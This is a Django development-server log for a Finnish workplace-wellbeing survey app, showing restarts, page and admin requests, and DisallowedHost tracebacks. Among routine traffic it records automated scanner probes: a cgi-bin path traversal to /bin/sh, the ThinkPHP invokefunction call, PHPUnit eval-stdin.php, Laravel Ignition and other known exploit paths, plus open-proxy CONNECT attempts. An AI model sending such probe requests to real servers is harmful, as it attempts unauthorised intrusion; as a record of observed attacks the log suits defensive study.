Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
April 13, 2023 - 01:59:58
Django version 4.1.7, using settings 'tyohyvinvointikysely.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
April 13, 2023 - 02:01:16
Django version 4.1.7, using settings 'tyohyvinvointikysely.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Error: That port is already in use.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
April 13, 2023 - 02:03:02
Django version 4.1.7, using settings 'tyohyvinvointikysely.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
Error: That port is already in use.
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
April 13, 2023 - 02:04:42
Django version 4.1.7, using settings 'tyohyvinvointikysely.settings'
Starting development server at http://0.0.0.0:8080/
Quit the server with CONTROL-C.
[13/Apr/2023 02:04:47] "GET / HTTP/1.1" 200 7633
[13/Apr/2023 02:04:47] "GET /static/css/custom.css HTTP/1.1" 304 0
[13/Apr/2023 02:05:03] "GET / HTTP/1.1" 200 7633
Watching for file changes with StatReloader
Performing system checks...

System check identified no issues (0 silenced).
April 13, 2023 - 02:12:43
Django version 4.1.7, using settings 'tyohyvinvointikysely.settings'
Starting development server at http://0.0.0.0:8080/
Quit the server with CONTROL-C.
[13/Apr/2023 02:12:52] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:12:52] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[13/Apr/2023 02:12:52] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[13/Apr/2023 02:12:52] "GET /static/css/custom.css HTTP/1.1" 304 0
[13/Apr/2023 02:13:00] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:13:04] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:13:10] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:13:10] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 02:13:10] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 02:13:10] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 02:13:16,042] - Broken pipe from ('80.220.204.224', 59246)
[13/Apr/2023 02:13:16,042] - Broken pipe from ('80.220.204.224', 59248)
[13/Apr/2023 02:13:16,042] - Broken pipe from ('80.220.204.224', 59247)
[13/Apr/2023 02:13:16,042] - Broken pipe from ('80.220.204.224', 59245)
[13/Apr/2023 02:13:27] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:13:29] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:22:00] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:22:01] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[13/Apr/2023 02:22:01] "GET /static/css/custom.css HTTP/1.1" 304 0
[13/Apr/2023 02:22:01] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[13/Apr/2023 02:31:04] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:31:16] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:31:16] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[13/Apr/2023 02:31:16] "GET /static/css/custom.css HTTP/1.1" 304 0
[13/Apr/2023 02:31:16] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[13/Apr/2023 02:31:44] "POST / HTTP/1.1" 200 1078
[13/Apr/2023 02:31:47] "GET /kysely/ HTTP/1.1" 200 7651
[13/Apr/2023 02:33:03] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:38:58] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:38:58] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 02:38:58] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 02:38:58] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[13/Apr/2023 02:38:58] "GET /favicon.ico HTTP/1.1" 404 2468
[13/Apr/2023 02:39:06] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 02:53:24] "GET / HTTP/1.1" 200 7651
Not Found: /favicon.ico
[13/Apr/2023 02:54:05] "GET /favicon.ico HTTP/1.1" 404 2464
Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'api.ipify.org'. You may need to add 'api.ipify.org' to ALLOWED_HOSTS.
Bad Request: /http:/api.ipify.org/
[13/Apr/2023 02:54:34] "GET http://api.ipify.org/?format=json HTTP/1.1" 400 62514
Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'www.shadowserver.org'. You may need to add 'www.shadowserver.org' to ALLOWED_HOSTS.
Bad Request: /www.shadowserver.org:443
[13/Apr/2023 02:54:57] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 62717
[13/Apr/2023 02:58:35] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 04:17:54] code 400, message Bad request version ('+Ú£')
[13/Apr/2023 04:17:54] You're accessing the development server over HTTPS, but it only supports HTTP.
[13/Apr/2023 04:18:04] "GET / HTTP/1.1" 200 7651
Not Found: /favicon.ico
[13/Apr/2023 04:18:23] "GET /favicon.ico HTTP/1.1" 404 2464
Not Found: /robots.txt
[13/Apr/2023 04:18:23] "GET /robots.txt HTTP/1.1" 404 2461
Not Found: /sitemap.xml
[13/Apr/2023 04:18:23] "GET /sitemap.xml HTTP/1.1" 404 2464
[13/Apr/2023 04:18:24] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 05:23:56] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 06:59:57] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x03EcwßTÙ')
[13/Apr/2023 06:59:57] You're accessing the development server over HTTPS, but it only supports HTTP.
[13/Apr/2023 07:27:38,071] - Broken pipe from ('167.94.146.57', 43326)
[13/Apr/2023 07:27:39] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 07:27:39,146] - Broken pipe from ('167.94.146.57', 49668)
[13/Apr/2023 07:27:39] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 07:27:39] code 505, message Invalid HTTP version (2.0)
[13/Apr/2023 07:27:39] "PRI * HTTP/2.0" 505 -
Not Found: /favicon.ico
[13/Apr/2023 07:27:39] "GET /favicon.ico HTTP/1.1" 404 2464
Invalid HTTP_HOST header: 'localhost:8080'. You may need to add 'localhost' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'localhost:8080'. You may need to add 'localhost' to ALLOWED_HOSTS.
Bad Request: /
[13/Apr/2023 07:41:47] "GET / HTTP/1.0" 400 61996
[13/Apr/2023 07:44:22] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 07:48:41] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:10:05] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:10:06] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:37:52] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:37:53] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 08:37:53] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 08:37:53] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[13/Apr/2023 08:37:53] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 08:40:16] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:40:16] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 08:40:16] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 08:40:16] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[13/Apr/2023 08:40:17] "GET /favicon.ico HTTP/1.1" 404 2468
[13/Apr/2023 08:42:05] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:46:33] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:47:54] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:47:55] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 08:47:55] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 08:47:55] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 08:48:03,802] - Broken pipe from ('80.220.204.224', 60783)
[13/Apr/2023 08:48:03,802] - Broken pipe from ('80.220.204.224', 60782)
[13/Apr/2023 08:48:03,803] - Broken pipe from ('80.220.204.224', 60779)
[13/Apr/2023 08:48:03,803] - Broken pipe from ('80.220.204.224', 60780)
[13/Apr/2023 08:48:32] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:51:20] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:51:20] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 08:51:20] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 08:51:20] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 08:51:38,544] - Broken pipe from ('80.220.204.224', 60785)
[13/Apr/2023 08:51:38,544] - Broken pipe from ('80.220.204.224', 60789)
[13/Apr/2023 08:51:38,544] - Broken pipe from ('80.220.204.224', 60786)
[13/Apr/2023 08:51:38,545] - Broken pipe from ('80.220.204.224', 60788)
[13/Apr/2023 08:54:42] "GET /admin HTTP/1.1" 301 0
[13/Apr/2023 08:54:42] "GET /admin/ HTTP/1.1" 302 0
[13/Apr/2023 08:54:43] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 2218
[13/Apr/2023 08:54:43] "GET /static/admin/css/base.css HTTP/1.1" 200 20344
[13/Apr/2023 08:54:43] "GET /static/admin/css/responsive.css HTTP/1.1" 200 18854
[13/Apr/2023 08:54:43] "GET /static/admin/css/dark_mode.css HTTP/1.1" 200 796
[13/Apr/2023 08:54:43] "GET /static/admin/css/nav_sidebar.css HTTP/1.1" 200 2619
[13/Apr/2023 08:54:43] "GET /static/admin/js/nav_sidebar.js HTTP/1.1" 200 3763
[13/Apr/2023 08:54:43] "GET /static/admin/css/login.css HTTP/1.1" 200 958
[13/Apr/2023 08:54:43] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[13/Apr/2023 08:54:43] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 85876
[13/Apr/2023 08:54:43] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 85692
Not Found: /favicon.ico
[13/Apr/2023 08:54:43] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 08:54:52] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 200 86184
[13/Apr/2023 08:54:59] "POST /admin/login/?next=/admin/ HTTP/1.1" 302 0
[13/Apr/2023 08:54:59] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 08:54:59] "GET /static/admin/css/dashboard.css HTTP/1.1" 200 380
[13/Apr/2023 08:54:59] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 200 380
[13/Apr/2023 08:54:59] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 200 331
[13/Apr/2023 08:54:59] "GET /static/admin/img/icon-deletelink.svg HTTP/1.1" 200 392
[13/Apr/2023 08:55:04] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 08:55:04] "GET /static/admin/css/changelists.css HTTP/1.1" 200 6395
[13/Apr/2023 08:55:04] "GET /static/admin/js/jquery.init.js HTTP/1.1" 200 347
[13/Apr/2023 08:55:04] "GET /static/admin/js/core.js HTTP/1.1" 200 5698
[13/Apr/2023 08:55:04] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 08:55:04] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 200 8985
[13/Apr/2023 08:55:05] "GET /static/admin/js/actions.js HTTP/1.1" 200 7872
[13/Apr/2023 08:55:05] "GET /static/admin/js/prepopulate.js HTTP/1.1" 200 1531
[13/Apr/2023 08:55:05] "GET /static/admin/js/urlify.js HTTP/1.1" 200 7902
[13/Apr/2023 08:55:05] "GET /static/admin/js/filters.js HTTP/1.1" 200 966
[13/Apr/2023 08:55:05] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.1" 200 288580
[13/Apr/2023 08:55:05] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.1" 200 232381
[13/Apr/2023 08:55:05] "GET /static/admin/img/tooltag-add.svg HTTP/1.1" 200 331
[13/Apr/2023 08:55:10] "GET /admin/kysely/vastaus/20/change/ HTTP/1.1" 200 11507
[13/Apr/2023 08:55:10] "GET /static/admin/css/forms.css HTTP/1.1" 200 8944
[13/Apr/2023 08:55:10] "GET /static/admin/js/calendar.js HTTP/1.1" 200 8466
[13/Apr/2023 08:55:10] "GET /static/admin/js/admin/DateTimeShortcuts.js HTTP/1.1" 200 19379
[13/Apr/2023 08:55:10] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 08:55:10] "GET /static/admin/js/change_form.js HTTP/1.1" 200 606
[13/Apr/2023 08:55:10] "GET /static/admin/js/prepopulate_init.js HTTP/1.1" 200 586
[13/Apr/2023 08:55:10] "GET /static/admin/css/widgets.css HTTP/1.1" 200 11297
[13/Apr/2023 08:55:10] "GET /static/admin/img/icon-calendar.svg HTTP/1.1" 200 1086
[13/Apr/2023 08:55:10] "GET /static/admin/img/icon-clock.svg HTTP/1.1" 200 677
[13/Apr/2023 08:55:24] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 08:55:27,750] - Broken pipe from ('80.220.204.224', 60829)
[13/Apr/2023 08:55:27,750] - Broken pipe from ('80.220.204.224', 60831)
[13/Apr/2023 08:55:27,751] - Broken pipe from ('80.220.204.224', 60827)
[13/Apr/2023 08:55:27,752] - Broken pipe from ('80.220.204.224', 60832)
[13/Apr/2023 08:55:27,752] - Broken pipe from ('80.220.204.224', 60828)
[13/Apr/2023 08:55:27,752] - Broken pipe from ('80.220.204.224', 60830)
[13/Apr/2023 08:57:30] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 08:57:31] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 08:57:31] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 08:57:31] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
Not Found: /favicon.ico
[13/Apr/2023 08:57:31] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 09:19:25] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:19:26] "GET /admin/ HTTP/1.1" 302 0
[13/Apr/2023 09:19:26] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 2218
Not Found: /apple-touch-icon-120x120-precomposed.png
[13/Apr/2023 09:19:26] "GET /apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 2554
Not Found: /apple-touch-icon-120x120.png
[13/Apr/2023 09:19:26] "GET /apple-touch-icon-120x120.png HTTP/1.1" 404 2518
Not Found: /apple-touch-icon-precomposed.png
[13/Apr/2023 09:19:26] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 2530
Not Found: /apple-touch-icon.png
[13/Apr/2023 09:19:27] "GET /apple-touch-icon.png HTTP/1.1" 404 2494
Not Found: /favicon.ico
[13/Apr/2023 09:19:27] "GET /favicon.ico HTTP/1.1" 404 2467
Not Found: /apple-touch-icon-120x120-precomposed.png
[13/Apr/2023 09:19:27] "GET /apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 2554
Not Found: /apple-touch-icon-120x120.png
[13/Apr/2023 09:19:27] "GET /apple-touch-icon-120x120.png HTTP/1.1" 404 2518
Not Found: /apple-touch-icon-precomposed.png
[13/Apr/2023 09:19:27] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 2530
Not Found: /apple-touch-icon.png
[13/Apr/2023 09:19:27] "GET /apple-touch-icon.png HTTP/1.1" 404 2494
Not Found: /favicon.ico
[13/Apr/2023 09:19:28] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 09:19:29] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:19:29] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:19:33] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:19:33] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:40:44] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:40:44] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:40:46] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:40:46] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:40:51] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:40:53] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:40:54] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:50:10] "GET /admin HTTP/1.1" 301 0
[13/Apr/2023 09:50:10] "GET /admin/ HTTP/1.1" 302 0
[13/Apr/2023 09:50:11] "GET /admin/login/?next=/admin/ HTTP/1.1" 200 2218
[13/Apr/2023 09:50:11] "GET /static/admin/css/base.css HTTP/1.1" 200 20344
[13/Apr/2023 09:50:11] "GET /static/admin/css/dark_mode.css HTTP/1.1" 200 796
[13/Apr/2023 09:50:11] "GET /static/admin/css/nav_sidebar.css HTTP/1.1" 200 2619
[13/Apr/2023 09:50:11] "GET /static/admin/css/login.css HTTP/1.1" 200 958
[13/Apr/2023 09:50:11] "GET /static/admin/css/responsive.css HTTP/1.1" 200 18854
[13/Apr/2023 09:50:11] "GET /static/admin/js/nav_sidebar.js HTTP/1.1" 200 3763
[13/Apr/2023 09:50:11] "GET /static/admin/css/fonts.css HTTP/1.1" 200 423
[13/Apr/2023 09:50:12] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.1" 200 85876
[13/Apr/2023 09:50:12] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.1" 200 85692
Not Found: /favicon.ico
[13/Apr/2023 09:50:12] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 09:50:25] "POST /admin/login/?next=/admin/ HTTP/1.1" 302 0
[13/Apr/2023 09:50:25] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:50:26] "GET /static/admin/css/dashboard.css HTTP/1.1" 200 380
[13/Apr/2023 09:50:26] "GET /static/admin/img/icon-addlink.svg HTTP/1.1" 200 331
[13/Apr/2023 09:50:26] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 200 380
[13/Apr/2023 09:50:26] "GET /static/admin/img/icon-deletelink.svg HTTP/1.1" 200 392
[13/Apr/2023 09:50:26] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.1" 200 86184
[13/Apr/2023 09:50:29] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:50:29] "GET /static/admin/css/changelists.css HTTP/1.1" 200 6395
[13/Apr/2023 09:50:29] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:50:29] "GET /static/admin/js/jquery.init.js HTTP/1.1" 200 347
[13/Apr/2023 09:50:29] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 200 8985
[13/Apr/2023 09:50:29] "GET /static/admin/js/core.js HTTP/1.1" 200 5698
[13/Apr/2023 09:50:29] "GET /static/admin/js/actions.js HTTP/1.1" 200 7872
[13/Apr/2023 09:50:29] "GET /static/admin/js/urlify.js HTTP/1.1" 200 7902
[13/Apr/2023 09:50:29] "GET /static/admin/js/prepopulate.js HTTP/1.1" 200 1531
[13/Apr/2023 09:50:29] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.1" 200 288580
[13/Apr/2023 09:50:29] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.1" 200 232381
[13/Apr/2023 09:50:29] "GET /static/admin/js/filters.js HTTP/1.1" 200 966
[13/Apr/2023 09:50:30] "GET /static/admin/img/tooltag-add.svg HTTP/1.1" 200 331
[13/Apr/2023 09:50:36] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:50:53] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:50:53] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:51:03] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:52:17] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:52:17] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:52:19] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:55:47] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 09:55:48] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 09:55:50] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 09:58:53] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 09:58:53] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 09:58:54] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
[13/Apr/2023 09:58:54] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
Not Found: /favicon.ico
[13/Apr/2023 09:58:54] "GET /favicon.ico HTTP/1.1" 404 2467
[13/Apr/2023 10:03:59] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 10:22:22] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 10:22:23] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 10:22:23] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 10:52:22] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 10:52:23] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 11:02:38] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 11:02:38] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Not Found: /securityRealm/user/admin/search/index
[13/Apr/2023 11:16:23] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 2546
Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[13/Apr/2023 11:19:46] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 11:19:46] "GET /static/css/custom.css HTTP/1.1" 200 726
[13/Apr/2023 11:19:46] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 200 78129
[13/Apr/2023 11:19:46] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 163873
Not Found: /favicon.ico
[13/Apr/2023 11:19:47] "GET /favicon.ico HTTP/1.1" 404 2468
[13/Apr/2023 11:20:51] "GET / HTTP/1.1" 200 7651
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[13/Apr/2023 11:22:11] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2582
Not Found: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[13/Apr/2023 11:24:20] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2581
[13/Apr/2023 11:24:47] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 11:24:47] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Not Found: /index.php
[13/Apr/2023 11:27:55] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 2577
[13/Apr/2023 11:30:43] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 7651
Not Found: /mifs/.;/services/LogService
[13/Apr/2023 11:34:23] "POST /mifs/.;/services/LogService HTTP/1.1" 404 2515
Not Found: /console/
[13/Apr/2023 11:38:49] "GET /console/ HTTP/1.1" 404 2455
Not Found: /Autodiscover/Autodiscover.xml
[13/Apr/2023 11:39:55] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 2519
Not Found: /_ignition/execute-solution
[13/Apr/2023 11:42:40] "GET /_ignition/execute-solution HTTP/1.1" 404 2509
[13/Apr/2023 11:46:46] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 11:48:00] "GET / HTTP/1.1" 200 7651
[13/Apr/2023 11:50:21] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 11:50:21] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 11:52:00] "GET /admin/ HTTP/1.1" 200 6713
Not Found: /cgi-bin/../../../../bin/sh
[13/Apr/2023 11:52:07] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 2490
[13/Apr/2023 11:54:25] "GET / HTTP/1.1" 200 7651
Not Found: /actuator/gateway/routes
[13/Apr/2023 11:55:43] "GET /actuator/gateway/routes HTTP/1.1" 404 2500
Not Found: /geoserver
[13/Apr/2023 12:00:18] "GET /geoserver HTTP/1.1" 404 2458
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[13/Apr/2023 12:05:08] "GET / HTTP/1.0" 400 62304
[13/Apr/2023 12:21:17] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 12:21:17] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 12:21:18] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 12:21:18] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 12:21:21] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 12:56:58] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 12:56:58] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[13/Apr/2023 12:56:59] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 13:02:17] "GET /admin/ HTTP/1.1" 200 6713
[13/Apr/2023 13:02:17] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7382
[13/Apr/2023 13:02:18] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
